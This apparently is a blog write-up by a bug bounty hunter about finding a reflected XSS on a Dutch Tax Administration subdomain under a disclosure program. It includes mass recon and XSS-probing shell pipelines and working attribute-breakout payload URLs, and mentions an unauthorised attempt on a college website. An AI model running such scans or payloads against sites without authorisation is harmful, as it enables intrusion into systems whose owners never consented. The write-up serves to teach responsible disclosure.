Hello everyone,

Today, I want to share a story that feels almost unreal — how I successfully hacked the Dutch Tax Administration and earned a spot in their Hall of Fame! What started as a simple hope of winning a ‘lousy’ T-shirt turned into an unforgettable journey.

A little about me: I’m from India, a bug bounty hunter by passion, and a part-time BTech Computer Science student by force 😅. Balancing coding, hacking, and assignments isn’t easy, but it definitely keeps life interesting!

How It All Began

When I first started, back in the 2023, I didn’t even know what “web security” really meant. I was just a curious beginner, experimenting with Termux, trying out Wi-Fi hacking, and rooting phones. No real hacking skills, just a lot of curiosity.

One day, my friend dared me to hack our college’s website(obviously, all for “educational purposes”).

Feeling like a “Pro hacker” (all thanks to my rooted phone😎), I accepted without knowing anything about web hacking.

Of course, I wasn’t successful But hey, I didn’t stop there. In my attempt to break into the site, I stumbled upon bug bounty programs, and let’s just say… that was the start of my addiction.

The Start of My Bug Bounty Journey

I started reading everything I could about web hacking, especially XSS (Cross-Site Scripting) as they seemed fun and challenging. I completed many labs, hunted for XSS vulnerabilities on open platforms like OpenBugBounty, and read tons of tutorials and write-ups. It was an exciting journey, and then one day I saw something that caught my attention

— a loosey Dutch T-shirt! (Yeah, don’t ask me why — but it became my goal to get that T-shirt by hacking the Dutch government!)

Dutch Government VDP

First, Let’s dive into the Dutch Government’s Vulnerability Disclosure Program (VDP). You can check out the VDP here: VDP Link

This VDP is a great target for beginners because there’s less competition, and the scope is huge. Here’s a curated list of domains that are in scope: Gist Link

Finding a vulnerability

Initially, I focused on low-hanging vulnerabilities like directory listing, broken link hijacking, and security misconfigurations, I expected these to be quick wins but I kept hitting duplicate reports, especially for XSS, which I found on static sites. The Dutch government doesn’t seem to care about these, so I kept getting duplicate or not applicable messages after spending almost 3 months. Realizing the space was more competitive than expected, I decided to shift my focus to Dutch government service websites like Belastingdienst, Rijksoverheid, and others

Recon: Subdomain Enumeration

For subdomain enumeration, I used tools like subfinder, assetfinder, amass, and sublister, along with online platforms like crt.sh, subdomainfinder.c99.nl, and virustotal.com. This helped ensure I didn’t miss any subdomains

Web probing :

After gathering the list, I used httpx to filter live subdomains, reducing the total by half

Expecting Luck With Nuclei :

I scanned the subdomains using Nuclei, hoping to find something valuable. But after scanning for a month and getting mostly failures or invalid reports, I was starting to feel stuck.

Each time I thought I was close to finding something, I’d end up with nothing useful. It was discouraging, and I was about to give up on the Dutch program altogether. But instead of quitting, I took a step back, did some more research, and realized I needed to change my methodology. I had to try something different to make progress.

The Hunt for XSS: The Final Push

I refined my approach by narrowing down subdomains based on tech stacks like PHP, WordPress, and Apache using httpx:

cat all-subs.txt | httpx -td | grep PHP |  awk '{print $1}' >> Php.txt

cat all-subs.txt | httpx -td | grep WordPress | awk '{print $1}' >> Wordpress.txt

cat all-subs.txt | httpx -td | grep Apache | awk '{print $1}' >> Apache.txt

Next, I filtered out live subdomains with:

cat Php.txt Wordpress.txt Apache.txt | httpx -ports 80,443,8080,8000,8888 >> live.txt

Then, I used tools like waybackurls, gau, and paramspider to gather all potential parameters for testing XSS:

cat live.txt | waybackurls >> Urls.txt

cat live.txt | gau >> Gau.txt

cat live.txt | hakrawler >> Spider.txt

while read URL; do python3 paramspider.py -d "$URL" -l high | grep -oP 'https?://[^\s]+' >> paramspider.txt; sleep 2; done < live.txt 

After collecting the URLs from all sources, I merged them into one comprehensive file for further analysis:

cat Urls.txt Gau.txt Spider.txt paramspider.txt >> AllUrls.txt

To maximize efficiency, I combined both automated and manual testing.

For automation, I usedkxss to detect XSS reflections:

cat AllUrls.txt | grep = | uro | kxss

For manual testing, I used Burp Suite alongside httpx, which forwarded requests through a proxy for detailed inspection:

cat AllUrls.txt | qsreplace "FUZZ" | sed 's/FUZZ/<h1>Test<\/h1>/' | httpx -http-proxy http://127.0.0.1:8080 -silent -match-string "<h1>Test</h1>"

After this thorough process, I identified three suspicious URLs.

• One parameter allowed only ".
• the other two allowed < and > but in a JavaScript context with regex filters in place

I focused on the parameter allowing ". Its response was reflected inside an <a> tag, The URL looked something like this:

https://sub.redacted.nl/?sfid=72&_sfm_belastingsoort=

<a href="/?sfid=72&_sfm_belastingsoort=Payload">

At first, I tried this payload:

https://sub.redacted.nl/?sfid=72&_sfm_belastingsoort=%3D%22onmouseover%3Dprompt()

<a href="/?sfid=72&_sfm_belastingsoort=" onmouseover=prompt()">

However, before the alert could even trigger, the page would just refresh when I hovered over the link. I realized something wasn’t working as expected, so I decided to investigate further.

After some research and testing, I came up with this approach:

https://sub.redacted.nl/?sfid=72&_sft_message_types=standpunt&_sfm_belastingsoort=%20%22style=%22display:%20block;%20position:%20fixed;%20top:%200;%20left:%200;%20z-index:%2099999;%20width:%209999px;%20height:%209999px;%22%20onmouseover=%22alert(document.domain)%22

And this time, it worked! The XSS executed successfully

Timeline

• 25/02/24 — Reported the vulnerability.
• 26/02/24 — Received confirmation email.
• 11/03/24 — Issue patched, and they requested my details for the Hall of Fame and a trophy.
• 27/03/24 — Hall of Fame updated, and the trophy was dispatched.
• 15/05/24 — Parcel shipped to my state, but I was unable to track it after that. I started wondering if it had gotten lost in transit.
• 23/05/24 — Surprise! Got a call from the local post office. My trophy had been chilling there, waiting for me all this time!

Trophy:

Letter of appreciation:

In the end, I didn’t get that loosey T-shirt I was hoping for, but I was grateful to be rewarded with something even more meaningful — a trophy!

Thank you for reading till the end!

Since this is my first writeup, there might be a few mistakes. If you have any suggestions to improve it, I’d love to hear them. Your feedback means a lot to me!

You can connect with me on LinkedIn